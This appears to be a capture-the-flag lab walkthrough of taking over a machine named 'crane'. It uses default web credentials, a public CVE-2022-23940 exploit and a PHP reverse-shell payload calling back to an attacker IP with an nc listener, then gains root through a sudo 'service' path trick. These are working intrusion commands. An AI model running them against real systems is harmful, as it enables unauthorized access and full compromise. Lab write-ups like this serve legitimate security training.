-
1
Nmap
nmap $ip Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql
-
2
We visited the website on port 80.
-
3
Looking for ways to access the machine.
We tried with the basic credentials, and "Admin Admin" worked in lowercase. After not finding anything interesting, we searched the internet for vulnerabilities of the version and found a GitHub that has it.
CVE-2022-23940 -
4
We cloned and installed the requirements from the GitHub repository.
Installation. Make sure to have a recent version of python3 and pip installed. Clone the repo: git clone https://github.com/manuelz120/CVE-2022-23940.git Install the required libraries pip3 install -r "requirements.txt" Also modify the exploit.py with the IP, localhost is the default: default="http://192.168.204.146",./exploit.py -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.172\", 443); exec(\"/bin/sh -i <&3 >&3 2>&3\");'" #Open another terminal for nc nc -nlvp 443
Once we obtain the shell, we can enhance it with:
python -c 'import pty;pty.spawn("/bin/bash")' #Control Z stty raw -echo; fg export TERM=xterm -
5
Having the interactive shell, we can execute some basic commands.
www-data@crane:/var/www/html$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sudo -l Matching Defaults entries for www-data on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on localhost: (ALL) NOPASSWD: /usr/sbin/service -
6
Seeing "service" has NOPASSWD, we can obtain a shell with its sudo privilege.
sudo /usr/sbin/service ../../../bin/sh # whoami root
-
7
Once we're root, we simply search for the flag to report the machine.
# cd root # ls email1.txt proof.txt # cat proof.txt XXX9be81080XXXXXX3844493aa3dcXXX
That's all.